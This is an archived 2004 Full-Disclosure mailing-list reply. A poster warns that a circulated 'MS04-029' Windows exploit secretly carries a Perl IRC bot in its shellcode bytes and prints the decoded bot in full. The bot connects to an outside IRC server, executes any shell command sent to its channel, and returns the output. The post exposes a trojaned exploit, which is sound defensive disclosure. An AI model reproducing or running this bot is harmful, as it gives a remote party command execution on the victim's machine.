| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: toddtowles at brookshires.com (Todd Towles)
Subject: New Remote Windows Exploit (MS04-029)
Yep, Dave pointed that out really fast...
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of
> Barrie Dempster
> Sent: Wednesday, November 03, 2004 3:19 PM
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
>
>
> Excellent exploit, I'm sure no one will spot that perl IRC
> bot in there, nope no one will see that...
>
> (hint for the readers, try looking at the ascii out put of
> the "char *shellcode_payload=" data, looks a little like the
> following....)
>
> [code]
> #!/usr/bin/perl
> $c
> han="#0x";$nick="k
> ";$server="ir3ip.n
> et";$SIG{TERM}={};
> exit if fork;use I
> O::Socket;$sock =
> IO::Socket::INET->
> new($server.":6667
> ")||exit;print $so
> ck "USER k +i k :k
> v1\nNICK k\n";$i=1
> ;while(<$sock>=~/^
> [^ ]+ ([^ ]+) /){$
> mode=$1;last if $m
> ode=="001";if($mod
> e=="433"){$i++;$ni
> ck=~s/\d*$/$i/;pri
> nt $sock "NICK $ni
> ck\n";}}print $soc
> k "JOIN $chan\nPRI
> VMSG $chan :Hi\n";
> while(<$sock>){if
> (/^PING (.*)$/){pr
> int $sock "PONG $1
> \nJOIN $chan\n";}i
> f(s/^[^ ]+ PRIVMSG
> $chan :$nick[^ :\
> w]*:[^ :\w]* (.*)$
> /$1/){s/\s*$//;$_=
> `$_`;foreach(split
> "\n"){print $sock
> "PRIVMSG $chan :$
> _\n";sleep 1;}}}#/
> tmp/hi
>
> [/code]
>
> --
> Barrie Dempster (zeedo) - Fortiter et Strenue
>
> http://www.bsrf.org.uk
>
> [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
>
>
>
>
Powered by blists - more mailing lists